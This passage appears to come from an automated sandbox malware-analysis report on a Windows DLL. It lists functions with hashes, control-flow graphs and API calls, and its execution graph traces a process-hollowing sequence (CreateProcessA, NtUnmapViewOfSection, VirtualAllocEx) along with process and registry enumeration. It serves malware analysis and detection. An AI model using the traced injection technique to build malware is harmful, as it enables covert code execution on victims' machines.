    • Opcode Fuzzy Hash: 5f3d0cc3c76e46f5f31987359fa37c2af6f4afc302266c4a070b6cef010a1ded
    • Instruction Fuzzy Hash: 861152B5E00204BBFB40DAA49C82B5E76EDEB19390F204075F908B7146EA72AB549755
    Uniqueness

    Uniqueness Score: -1.00%

    Function 100061D0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
    Download Yara Rule
    APIs
    • EnumWindows.USER32(1000751D,00000000), ref: 10006227
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: EnumWindows
    • String ID:
    • API String ID: 1129996299-0
    • Opcode ID: 625bdedb4d99f10813f705d1af74ccca0714d5851e99858dc909065e667d64fd
    • Instruction ID: d33495aa917abc3b8b796f041dc489c144632f2343e8c7b2b05d79a98a5b0348
    • Opcode Fuzzy Hash: 625bdedb4d99f10813f705d1af74ccca0714d5851e99858dc909065e667d64fd
    • Instruction Fuzzy Hash: 010179B5D14304F7FB40EFA09D827AE76B9EB0A7C0F101075F10977145DA71A7049762
    Uniqueness

    Uniqueness Score: -1.00%

    Function 100068F2 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
    Download Yara Rule
    APIs
    • VirtualProtect.KERNEL32(1000677F,00000004,00000040,?,?,1000677F), ref: 1000691E
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: ProtectVirtual
    • String ID:
    • API String ID: 544645111-0
    • Opcode ID: 6603756e94fc822b0f178c3ca2cd8c7771027378d4e9126c1b250f0f86f3e113
    • Instruction ID: c0e524da7635b36303f780a4e913d96941c03759a563f0c821b7b937aacd4d45
    • Opcode Fuzzy Hash: 6603756e94fc822b0f178c3ca2cd8c7771027378d4e9126c1b250f0f86f3e113
    • Instruction Fuzzy Hash: 6EF012B4D04208FBEB00DF94D842BADBB79EB15340F108065F6186A184D671AB149B95
    Uniqueness

    Uniqueness Score: -1.00%

    Function 1000676C Relevance: .1, Instructions: 117COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: ProtectVirtual
    • String ID:
    • API String ID: 544645111-0
    • Opcode ID: 098c31e4f898cfe48a8f67f8b3e92f0b956c9a0b306acbd8a685e161ce07b733
    • Instruction ID: faaec284ed0066216158bd651b25f1daaeb72d3a93f6d088fe4fdfa133ec9378
    • Opcode Fuzzy Hash: 098c31e4f898cfe48a8f67f8b3e92f0b956c9a0b306acbd8a685e161ce07b733
    • Instruction Fuzzy Hash: C24161B4E00315ABFB40DFA4DCC1B9D77EEEF08390F204079E909A6246DBB1AA049B11
    Uniqueness

    Uniqueness Score: -1.00%

    Function 100017B4 Relevance: .0, Instructions: 25COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 4263d83a6fb9b114440df30be9fa905148a7d7abb542143c69aee057420f8470
    • Instruction ID: 5f6ff988ee4a52dbb1b88e021e6d1ef049e7667361733a4f8f93488a0d93900d
    • Opcode Fuzzy Hash: 4263d83a6fb9b114440df30be9fa905148a7d7abb542143c69aee057420f8470
    • Instruction Fuzzy Hash: B0F0A53A6046958FDA65CF08D4D0D85B3F4FB086A8B1548A9DA8AE7B05C360BC44CB90
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10007FBF Relevance: .0, Instructions: 18COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 74f784cdb4109649341f86efef469bfaa235da18b29abecc4f88cf6ff71aeb9b
    • Instruction ID: 9089d424d36cda4875cc89eda8c574f5a5f83e2d6b8bb971a0c156854d0e121b
    • Opcode Fuzzy Hash: 74f784cdb4109649341f86efef469bfaa235da18b29abecc4f88cf6ff71aeb9b
    • Instruction Fuzzy Hash: 99D0A970C1920897E640EFA06A0367DB638E703281F0020B6B84C27184EA369A2493EB
    Uniqueness

    Uniqueness Score: -1.00%

    Function 1000AE00 Relevance: 27.4, APIs: 18, Instructions: 426windowstringCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 2917 1000ae00-1000ae13 2918 1000b1f2-1000b1fb 2917->2918 2919 1000ae19 2917->2919 2920 1000b201 2918->2920 2921 1000b2e8-1000b30a wsprintfA MessageBoxA 2918->2921 2922 1000b13b-1000b147 2919->2922 2923 1000ae1f-1000ae24 2919->2923 2920->2921 2926 1000b310 2920->2926 2927 1000b244-1000b266 call 10009480 2920->2927 2928 1000b225-1000b241 call 100094c0 2920->2928 2929 1000b2d6-1000b2e5 2920->2929 2930 1000b2b7-1000b2d3 call 10009390 2920->2930 2931 1000b208-1000b222 call 10009430 2920->2931 2932 1000b269-1000b2b4 wsprintfA MessageBoxA call 10009390 2920->2932 2921->2926 2924 1000b1a2-1000b1a7 2922->2924 2925 1000b149 2922->2925 2933 1000b034-1000b03c 2923->2933 2934 1000ae2a 2923->2934 2946 1000b1c8-1000b1cd 2924->2946 2947 1000b1a9 2924->2947 2936 1000b1d3-1000b1ef call 100094c0 2925->2936 2937 1000b14f-1000b154 2925->2937 2942 1000b312-1000b31c 2926->2942 2939 1000b042-1000b043 2933->2939 2940 1000b0fd-1000b111 GetModuleFileNameA 2933->2940 2943 1000ae30-1000ae35 2934->2943 2944 1000aff4-1000b002 GetCommandLineA 2934->2944 2959 1000b156 2937->2959 2960 1000b18c-1000b191 2937->2960 2950 1000b0c3-1000b0d7 GetModuleFileNameA 2939->2950 2951 1000b045-1000b048 2939->2951 2940->2926 2957 1000b117-1000b138 strrchr 2940->2957 2953 1000af95-1000af9a 2943->2953 2954 1000ae3b 2943->2954 2963 1000b004 2944->2963 2964 1000b006-1000b00b 2944->2964 2946->2926 2946->2936 2947->2936 2962 1000b1ab-1000b1b0 2947->2962 2950->2926 2971 1000b0dd-1000b0fa strrchr 2950->2971 2951->2921 2968 1000b04e-1000b065 PeekMessageA 2951->2968 2953->2921 2973 1000afa0-1000afb2 2953->2973 2969 1000ae72-1000ae86 GetModuleFileNameA 2954->2969 2970 1000ae3d-1000ae45 2954->2970 2959->2936 2972 1000b158-1000b160 2959->2972 2960->2936 2974 1000b193-1000b19f 2960->2974 2962->2936 2975 1000b1b2-1000b1b7 2962->2975 2963->2964 2965 1000b014-1000b017 2964->2965 2966 1000b00d-1000b012 2964->2966 2965->2942 2976 1000b01d-1000b020 2965->2976 2966->2965 2966->2966 2968->2926 2977 1000b06b-1000b077 2968->2977 2980 1000aec0-1000aec7 2969->2980 2981 1000ae88-1000aebe strrchr 2969->2981 2978 1000ae60-1000ae6f 2970->2978 2979 1000ae47-1000ae48 2970->2979 2972->2926 2982 1000b166 2972->2982 2973->2942 2983 1000afb8-1000afbe 2973->2983 2975->2936 2984 1000b1b9-1000b1c5 2975->2984 2976->2942 2985 1000b026-1000b031 2976->2985 2986 1000b07d-1000b082 2977->2986 2979->2921 2987 1000ae4e-1000ae5d 2979->2987 2988 1000aece-1000aed6 2980->2988 2981->2988 2982->2921 2982->2926 2982->2927 2982->2928 2982->2929 2982->2930 2982->2931 2982->2932 2982->2936 2989 1000b16d-1000b189 call 1000be80 2982->2989 2990 1000afe0-1000aff1 _ftol 2983->2990 2991 1000afc0-1000afc6 2983->2991 2986->2926 2992 1000b088-1000b0b4 GetMessageA TranslateMessage DispatchMessageA PeekMessageA 2986->2992 2993 1000af5c-1000af92 2988->2993 2994 1000aedc-1000aee1 2988->2994 2991->2942 2996 1000afcc-1000afdd _ftol 2991->2996 2992->2986 2997 1000b0b6-1000b0c0 2992->2997 2998 1000af23-1000af59 2994->2998 2999 1000aee3-1000aee4 2994->2999 2999->2926 3001 1000aeea-1000af20 2999->3001
    APIs
    • GetModuleFileNameA.KERNEL32(00000000,1006A2E0,00000104), ref: 1000AE7E
    • strrchr.MSVCRT ref: 1000AE8F
    • _ftol.MSVCRT ref: 1000AFCE
    • GetCommandLineA.KERNEL32 ref: 1000AFF4
    • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 1000B061
    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1000B093
    • TranslateMessage.USER32(?), ref: 1000B09A
    • DispatchMessageA.USER32(?), ref: 1000B0A1
    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000B0B0
    • wsprintfA.USER32 ref: 1000B2F3
    • MessageBoxA.USER32(00000000,?,1006A018,00000010), ref: 1000B30A
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: Message$Peek$CommandDispatchFileLineModuleNameTranslate_ftolstrrchrwsprintf
    • String ID:
    • API String ID: 3335176381-0
    • Opcode ID: ecb263c5883be14fbdd7951b27c3f5027ec344516bfbf6eaecd4f87e6cf4e675
    • Instruction ID: 550dcc155c2af2a742ea6bd1faa3485fa46c40cd6c1f5de1c3546930abff5cc3
    • Opcode Fuzzy Hash: ecb263c5883be14fbdd7951b27c3f5027ec344516bfbf6eaecd4f87e6cf4e675
    • Instruction Fuzzy Hash: 48C139377849044AF320E668BC41BFFB781E7D13F2F50053BEA05CA1D4D96BA949CA66
    Uniqueness

    Uniqueness Score: -1.00%

    Function 1000C440 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 97COMMON
    Download Yara Rule
    APIs
    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,?,00000000), ref: 1000C4CB
    • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 1000C4EA
    • GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 1000C501
    • GetTempPathA.KERNEL32(00000104,00000000), ref: 1000C518
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: DirectoryPath$FolderSpecialSystemTempWindows
    • String ID: \$\
    • API String ID: 2721284240-164819647
    • Opcode ID: 9b90a25063b9e1c39bff7ddda37614abe361fa60ecb1f47f8ab911e9c3895cb3
    • Instruction ID: 77cbe7fce8ef9562389d15453b58eba8ebe27cca9de610a2ae966a0e19f657af
    • Opcode Fuzzy Hash: 9b90a25063b9e1c39bff7ddda37614abe361fa60ecb1f47f8ab911e9c3895cb3
    • Instruction Fuzzy Hash: 7F3103B550874A9BF720C728CC95F6E36D0E7417C0F20891AF585C60D9E6B4E88097A2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 1000A370 Relevance: 7.7, APIs: 6, Instructions: 208COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 60cd75bbc9cd8ca24744c5fda6e17e72869eac0f45f0e376a98c2c6226a09f87
    • Instruction ID: 997e975f8056afc4703edd2e8b222d0f39c38b45864d1c521b5624a5b2537b3b
    • Opcode Fuzzy Hash: 60cd75bbc9cd8ca24744c5fda6e17e72869eac0f45f0e376a98c2c6226a09f87
    • Instruction Fuzzy Hash: 69514A756046054BF738C6248C42AEF73D5EBC23A0F248B2DFA55C31D8EE7AD9858392
    Uniqueness

    Uniqueness Score: -1.00%

    Function 1000BAB0 Relevance: 6.1, APIs: 4, Instructions: 87COMMON
    Download Yara Rule
    APIs
    • malloc.MSVCRT ref: 1000BB13
    • LCMapStringA.KERNEL32(00000804,00400000,?,?,00000000,?,?,?,100695CA,?,00000000,00000000,?,10009E2B,00000001,00000000), ref: 1000BB47
    • ??3@YAXPAX@Z.MSVCRT ref: 1000BB56
    • ??3@YAXPAX@Z.MSVCRT ref: 1000BB74
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: ??3@$Stringmalloc
    • String ID:
    • API String ID: 1006641717-0
    • Opcode ID: 6a2a28c6ebfc604dd3311785f4f21d4eed50436354b036f7b997f2173f3be702
    • Instruction ID: c44458945b11d331972013727580eba0770bfaca40fb43e82456e2fbb398e2da
    • Opcode Fuzzy Hash: 6a2a28c6ebfc604dd3311785f4f21d4eed50436354b036f7b997f2173f3be702
    • Instruction Fuzzy Hash: ED1105762046043BE218DA799C42E6B73CADBC42A1F10462DF226922C5DE72ED054765
    Uniqueness

    Uniqueness Score: -1.00%

    Execution Graph

    Execution Coverage:16.2%
    Dynamic/Decrypted Code Coverage:1.6%
    Signature Coverage:0%
    Total number of Nodes:765
    Total number of Limit Nodes:19
    execution_graph 6278 1000ae00 6279 1000b1f2 6278->6279 6280 1000ae19 6278->6280 6281 1000b2e8 wsprintfA MessageBoxA 6279->6281 6283 1000b244 6279->6283 6284 1000b225 6279->6284 6285 1000b2b7 6279->6285 6286 1000b208 6279->6286 6287 1000b269 wsprintfA MessageBoxA 6279->6287 6324 1000aec0 6279->6324 6282 1000ae1f 6280->6282 6308 1000b13b 6280->6308 6281->6324 6288 1000b034 6282->6288 6289 1000ae2a 6282->6289 6344 10009480 6283->6344 6295 100094c0 3 API calls 6284->6295 6298 10009390 ExitProcess 6285->6298 6292 10009430 4 API calls 6286->6292 6297 10009390 ExitProcess 6287->6297 6290 1000b042 6288->6290 6291 1000b0fd GetModuleFileNameA 6288->6291 6293 1000ae30 6289->6293 6294 1000aff4 GetCommandLineA 6289->6294 6299 1000b0c3 GetModuleFileNameA 6290->6299 6300 1000b045 6290->6300 6306 1000b117 strrchr 6291->6306 6291->6324 6301 1000b215 6292->6301 6302 1000af95 6293->6302 6303 1000ae3b 6293->6303 6294->6324 6304 1000b232 6295->6304 6307 1000b2a5 6297->6307 6309 1000b2c4 6298->6309 6314 1000b0dd strrchr 6299->6314 6299->6324 6300->6281 6311 1000b04e PeekMessageA 6300->6311 6302->6281 6315 1000afa0 6302->6315 6312 1000ae72 GetModuleFileNameA 6303->6312 6313 1000ae3d 6303->6313 6305 1000b259 6308->6281 6308->6283 6308->6284 6308->6285 6308->6286 6308->6287 6316 1000b18c 6308->6316 6321 1000b16d 6308->6321 6308->6324 6318 1000b06b 6311->6318 6311->6324 6320 1000ae88 strrchr 6312->6320 6312->6324 6313->6281 6319 1000ae4e 6313->6319 6322 1000afe0 _ftol 6315->6322 6323 1000afc0 6315->6323 6315->6324 6316->6324 6336 100094c0 6316->6336 6318->6324 6325 1000b088 GetMessageA TranslateMessage DispatchMessageA PeekMessageA 6318->6325 6320->6324 6330 1000be80 6321->6330 6323->6324 6327 1000afcc _ftol 6323->6327 6325->6318 6328 1000b0b6 6325->6328 6331 1000be9b 6330->6331 6332 1000becb 6331->6332 6334 100094c0 3 API calls 6331->6334 6333 100094c0 3 API calls 6332->6333 6335 1000b17a 6333->6335 6334->6331 6337 10009506 6336->6337 6338 100094cd 6336->6338 6339 100094d6 6338->6339 6340 100094db 6338->6340 6342 10009360 GetModuleHandleA 6339->6342 6340->6337 6341 100094eb IsBadHugeReadPtr 6340->6341 6341->6337 6343 100094f8 RtlFreeHeap 6341->6343 6342->6340 6343->6337 6345 10009494 6344->6345 6346 10009489 GetProcessHeap 6344->6346 6347 100094ac RtlAllocateHeap 6345->6347 6348 1000949c RtlReAllocateHeap 6345->6348 6346->6345 6347->6305 6348->6305 6349 10009205 6352 1000b390 GetModuleHandleA 6349->6352 6351 10009214 6351->6351 6353 1000b40b 6352->6353 6354 1000b3ae LoadLibraryA 6352->6354 6355 1000b427 strchr 6353->6355 6356 1000b417 atoi 6353->6356 6357 1000b3bb wsprintfA MessageBoxA 6354->6357 6359 1000b3e8 6354->6359 6361 1000b45f 6355->6361 6360 1000b46f GetProcAddress 6356->6360 6358 10009390 ExitProcess 6357->6358 6358->6359 6359->6353 6362 1000b4c6 6360->6362 6363 1000b47d wsprintfA MessageBoxA 6360->6363 6361->6360 6362->6351 6364 10009390 ExitProcess 6363->6364 6365 1000b4ab 6364->6365 6365->6351 6366 10004606 6367 10004633 6366->6367 6407 10005d6f GetEnvironmentVariableA 6367->6407 6369 1000464d 6370 10004786 CreateProcessA 6369->6370 6371 1000487e 6370->6371 6372 100049a4 GetThreadContext 6371->6372 6393 1000496f 6371->6393 6373 10004b18 6372->6373 6374 10009520 5 API calls 6373->6374 6375 10004bcb 6374->6375 6376 10004ccd 6375->6376 6377 10004cdf 6375->6377 6411 10005e5f TerminateProcess 6376->6411 6379 10004d24 ReadProcessMemory 6377->6379 6380 10004d39 6379->6380 6381 10004d50 6380->6381 6382 10004d62 NtUnmapViewOfSection 6380->6382 6384 10005e5f 3 API calls 6381->6384 6383 10004d85 6382->6383 6385 10004db1 VirtualAllocEx 6383->6385 6386 10004d9f 6383->6386 6384->6393 6388 10004dfc 6385->6388 6387 10005e5f 3 API calls 6386->6387 6387->6393 6389 10004e16 6388->6389 6391 10004e28 6388->6391 6390 10005e5f 3 API calls 6389->6390 6390->6393 6392 10005084 LocalSize 6391->6392 6406 1000509b 6392->6406 6394 100057c5 6395 10009520 5 API calls 6394->6395 6396 10005aab 6395->6396 6397 10005bd9 WaitForSingleObject 6396->6397 6398 10005bfd 6396->6398 6397->6398 6398->6393 6400 10005c14 CloseHandle 6398->6400 6399 10009520 GetModuleHandleA ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 6399->6406 6401 10005c43 CloseHandle 6400->6401 6402 10005c36 6400->6402 6401->6393 6402->6401 6404 10005660 6405 10005e5f 3 API calls 6404->6405 6405->6393 6406->6394 6406->6399 6406->6404 6417 10005f47 6406->6417 6408 10005da7 6407->6408 6409 10005dfb GetEnvironmentVariableA 6408->6409 6410 10005e1b 6409->6410 6410->6369 6412 10005e99 CloseHandle 6411->6412 6413 10005e8c 6411->6413 6414 10005ec8 CloseHandle 6412->6414 6415 10005ebb 6412->6415 6413->6412 6416 10005ee7 6414->6416 6415->6414 6416->6393 6418 10005f69 6417->6418 6419 10005fcc lstrcpyn 6418->6419 6422 10005fa1 6418->6422 6420 10005fdc 6419->6420 6421 1000600e RtlMoveMemory 6420->6421 6421->6422 6422->6406 6423 10008e08 6426 10007548 6423->6426 6431 1000754b 6426->6431 6432 1000757e 6431->6432 6445 10007779 6431->6445 6468 10007ffc 6431->6468 6485 1000a7a0 Sleep 6431->6485 6486 100024e3 6432->6486 6434 1000759f 6492 1000a7b0 6434->6492 6436 100075e7 6437 100024e3 4 API calls 6436->6437 6444 10007744 6436->6444 6438 1000763f 6437->6438 6510 1000a760 PathFileExistsA 6438->6510 6440 100076b3 6440->6444 6511 1000300a 6440->6511 6442 10007715 6519 10009710 SetFileAttributesA 6442->6519 6444->6431 6446 100024e3 4 API calls 6445->6446 6447 100077d9 6446->6447 6535 10009660 6447->6535 6449 100078ea 6450 100024e3 4 API calls 6449->6450 6451 10007919 6450->6451 6452 100024e3 4 API calls 6451->6452 6454 10007955 6452->6454 6453 100024e3 4 API calls 6455 10007991 6453->6455 6454->6453 6456 100024e3 4 API calls 6455->6456 6466 100079cd 6456->6466 6457 100079f8 RegEnumKeyA 6457->6466 6458 100024e3 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 6458->6466 6459 10007e76 6459->6431 6460 1000a7b0 15 API calls 6460->6466 6462 10009d80 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 6462->6466 6465 1000300a 3 API calls 6465->6466 6466->6457 6466->6458 6466->6459 6466->6460 6466->6462 6466->6465 6540 1000a950 6466->6540 6562 1000a6f0 6466->6562 6567 1000a760 PathFileExistsA 6466->6567 6568 10009710 SetFileAttributesA 6466->6568 6469 10008016 6468->6469 6470 10008037 CreateToolhelp32Snapshot 6469->6470 6471 100080a5 6470->6471 6472 10009520 5 API calls 6471->6472 6473 100080bf 6471->6473 6474 100081f5 6472->6474 6473->6431 6475 100024e3 4 API calls 6474->6475 6483 1000824f 6475->6483 6476 100086dd CloseHandle 6476->6473 6479 10009520 5 API calls 6479->6483 6482 1000300a 3 API calls 6482->6483 6483->6476 6483->6479 6483->6482 6621 1000a370 6483->6621 6648 10008779 6483->6648 6668 10009d80 6483->6668 6673 1000a760 PathFileExistsA 6483->6673 6674 10009710 SetFileAttributesA 6483->6674 6485->6431 6487 10002528 6486->6487 6520 100097e0 6487->6520 6489 10002768 6489->6434 6491 1000261c 6491->6489 6525 10009830 6491->6525 6493 1000a7c1 6492->6493 6495 1000a7ec ??2@YAPAXI strrchr 6493->6495 6496 1000a8fe 6493->6496 6494 1000a93a 6494->6436 6497 1000a825 6495->6497 6498 1000a829 RegOpenKeyA 6495->6498 6496->6494 6499 1000b990 4 API calls 6496->6499 6497->6498 6500 1000a8ed ??3@YAXPAX 6498->6500 6501 1000a83e ??2@YAPAXI RegQueryValueExA 6498->6501 6503 1000a923 6499->6503 6500->6496 6502 1000a92e 6500->6502 6504 1000a8b1 6501->6504 6505 1000a87c 6501->6505 6502->6436 6503->6436 6507 1000a8d9 ??3@YAXPAX RegCloseKey 6504->6507 6508 1000b990 4 API calls 6504->6508 6506 1000a883 ??3@YAXPAX ??2@YAPAXI RegQueryValueExA 6505->6506 6505->6507 6506->6504 6506->6505 6507->6500 6509 1000a8d2 6508->6509 6509->6507 6510->6440 6512 10003024 6511->6512 6513 1000304a CreateFileA 6512->6513 6514 1000309c 6513->6514 6515 1000324a WriteFile 6514->6515 6516 1000326a CloseHandle 6515->6516 6517 1000325d 6515->6517 6518 1000327f 6516->6518 6517->6516 6518->6442 6519->6444 6521 1000982b 6520->6521 6522 100097ea 6520->6522 6521->6491 6522->6521 6530 1000b500 6522->6530 6524 10009825 6524->6491 6526 10009839 6525->6526 6527 1000983d 6525->6527 6526->6491 6528 10009430 4 API calls 6527->6528 6529 10009844 6528->6529 6529->6491 6531 1000b509 6530->6531 6532 1000b50d 6530->6532 6531->6524 6533 10009430 4 API calls 6532->6533 6534 1000b517 6533->6534 6534->6524 6536 10009669 6535->6536 6537 1000966d 6535->6537 6536->6449 6538 10009430 4 API calls 6537->6538 6539 10009678 6538->6539 6539->6449 6541 1000a981 6540->6541 6545 1000a989 6540->6545 6541->6466 6542 1000ab52 6579 1000b9d0 6542->6579 6544 1000ab58 6544->6466 6545->6542 6546 1000aa0d 6545->6546 6555 1000aa93 6546->6555 6556 1000aa30 6546->6556 6547 1000aa97 _strnicmp 6547->6555 6548 1000aa38 _strncoll 6548->6556 6549 1000ab12 6551 1000b990 4 API calls 6549->6551 6550 1000b810 8 API calls 6550->6556 6553 1000ab29 6551->6553 6552 1000aa91 6552->6549 6569 1000b810 6552->6569 6576 1000b740 6553->6576 6555->6547 6555->6552 6559 1000b810 8 API calls 6555->6559 6556->6548 6556->6550 6556->6552 6559->6555 6560 1000b740 2 API calls 6561 1000ab48 6560->6561 6561->6466 6563 1000a751 6562->6563 6564 1000a705 6562->6564 6563->6466 6564->6563 6565 10009430 4 API calls 6564->6565 6566 1000a728 6565->6566 6566->6466 6567->6466 6568->6466 6570 1000b81a 6569->6570 6573 1000b82a 6569->6573 6584 1000b630 6570->6584 6572 1000b826 6572->6573 6601 1000b870 6572->6601 6573->6549 6575 1000b841 6575->6549 6577 1000b760 2 API calls 6576->6577 6578 1000ab37 6577->6578 6578->6560 6580 1000ba14 6579->6580 6581 1000b9d9 6579->6581 6580->6544 6581->6580 6582 10009430 4 API calls 6581->6582 6583 1000b9f7 6582->6583 6583->6544 6585 1000b64a 6584->6585 6586 1000b63d 6584->6586 6587 1000b651 6585->6587 6592 1000b65f 6585->6592 6588 1000b740 2 API calls 6586->6588 6606 1000b560 6587->6606 6590 1000b642 6588->6590 6590->6572 6591 1000b659 6591->6572 6593 1000b692 6592->6593 6594 1000b6a4 GetProcessHeap 6592->6594 6595 1000b6af 6592->6595 6593->6572 6594->6595 6596 1000b712 RtlReAllocateHeap 6595->6596 6597 1000b6b4 RtlAllocateHeap 6595->6597 6596->6590 6597->6590 6598 1000b6d0 6597->6598 6615 1000b760 6598->6615 6600 1000b6f8 6600->6572 6602 1000b8c3 6601->6602 6603 1000b878 6601->6603 6602->6575 6604 1000b87d 6603->6604 6605 1000b8b0 memmove 6603->6605 6604->6575 6605->6602 6607 1000b56c 6606->6607 6610 1000b57c 6606->6610 6608 1000b630 5 API calls 6607->6608 6609 1000b576 6608->6609 6609->6591 6611 1000b5fa RtlAllocateHeap 6610->6611 6612 1000b5ef GetProcessHeap 6610->6612 6613 1000b584 6610->6613 6614 1000b611 6611->6614 6612->6611 6613->6591 6614->6591 6616 1000b76a 6615->6616 6617 1000b7be 6615->6617 6618 1000b77e 6616->6618 6619 1000b7b4 HeapFree 6616->6619 6620 1000b7a9 GetProcessHeap 6616->6620 6617->6600 6618->6600 6619->6617 6620->6619 6622 1000a3f8 6621->6622 6631 1000a38f 6621->6631 6623 1000a403 6622->6623 6624 1000a4f4 6622->6624 6625 1000a409 6623->6625 6626 1000a4cf sprintf 6623->6626 6627 1000a572 6624->6627 6628 1000a4fb 6624->6628 6635 1000a497 6625->6635 6636 1000a479 6625->6636 6637 1000a41e 6625->6637 6638 1000a50f sprintf 6625->6638 6647 1000a5f4 6625->6647 6626->6637 6632 1000a579 6627->6632 6633 1000a5aa sprintf 6627->6633 6629 1000a4fd 6628->6629 6630 1000a54e sprintf 6628->6630 6639 1000a504 6629->6639 6640 1000a52e sprintf 6629->6640 6630->6637 6631->6647 6675 1000a300 6631->6675 6641 1000a584 sprintf 6632->6641 6632->6647 6633->6637 6680 1000bc30 modf 6635->6680 6643 1000a300 4 API calls 6636->6643 6646 10009430 4 API calls 6637->6646 6637->6647 6638->6637 6639->6638 6639->6647 6640->6637 6641->6637 6642 1000a3e9 6642->6483 6645 1000a488 6643->6645 6645->6483 6646->6647 6647->6483 6649 10008793 6648->6649 6650 100087c5 OpenProcess 6649->6650 6651 10008805 6650->6651 6694 10009bf0 6651->6694 6653 1000886b 6699 1000ac70 6653->6699 6655 10008922 6656 1000ac70 6 API calls 6655->6656 6660 10008a22 6656->6660 6657 10008a91 VirtualQueryEx 6658 10008ab4 6657->6658 6659 10009bf0 4 API calls 6658->6659 6661 10008b1c 6659->6661 6660->6657 6705 10008c8b 6661->6705 6663 10008b82 6713 1000a640 6663->6713 6665 10008bde 6666 10009d80 4 API calls 6665->6666 6667 10008c0c 6666->6667 6667->6483 6669 10009d97 6668->6669 6670 10009dcb 6668->6670 6669->6670 6671 10009430 4 API calls 6669->6671 6670->6483 6672 10009dae 6671->6672 6672->6483 6673->6483 6674->6483 6677 1000a311 6675->6677 6676 1000a31e 6676->6642 6677->6676 6678 10009430 4 API calls 6677->6678 6679 1000a34a 6678->6679 6679->6642 6686 1000c220 _ftol 6680->6686 6682 1000bc73 6687 1000c0a0 6682->6687 6684 1000bc91 sprintf 6684->6637 6686->6682 6688 1000c1f5 _ftol 6687->6688 6689 1000c0b9 6687->6689 6688->6684 6689->6688 6690 1000c0ca 6689->6690 6691 1000c0e0 _ftol 6690->6691 6692 1000c0f3 _ftol 6690->6692 6693 1000c104 6691->6693 6692->6693 6693->6684 6695 10009bf9 6694->6695 6696 10009bfd 6694->6696 6695->6653 6697 10009430 4 API calls 6696->6697 6698 10009c06 6697->6698 6698->6653 6700 1000ac80 6699->6700 6702 1000ac8c 6700->6702 6721 100093d0 6700->6721 6704 1000ad16 6702->6704 6726 1000ab70 6702->6726 6704->6655 6735 100095a0 6705->6735 6708 10008cfe 6709 10009660 4 API calls 6708->6709 6710 10008d27 6709->6710 6711 10008d88 WideCharToMultiByte 6710->6711 6712 10008dc2 6711->6712 6712->6663 6714 1000a66a 6713->6714 6720 1000a6b3 6713->6720 6715 1000a6bb 6714->6715 6716 1000a69b 6714->6716 6714->6720 6718 1000a6bf _strncoll 6715->6718 6715->6720 6717 1000a69f _strnicmp 6716->6717 6716->6720 6717->6716 6719 1000a6db 6717->6719 6718->6715 6718->6719 6719->6665 6720->6665 6722 100093e0 6721->6722 6723 100093ec wsprintfA MessageBoxA 6721->6723 6722->6723 6724 10009390 ExitProcess 6723->6724 6725 1000941c 6724->6725 6725->6702 6727 1000ab83 6726->6727 6728 1000ab9a 6726->6728 6727->6728 6729 1000abe7 6727->6729 6732 1000abba 6727->6732 6728->6704 6730 1000b500 4 API calls 6729->6730 6731 1000abf6 6730->6731 6731->6704 6733 1000b990 4 API calls 6732->6733 6734 1000abde 6733->6734 6734->6704 6736 10008cc0 WideCharToMultiByte 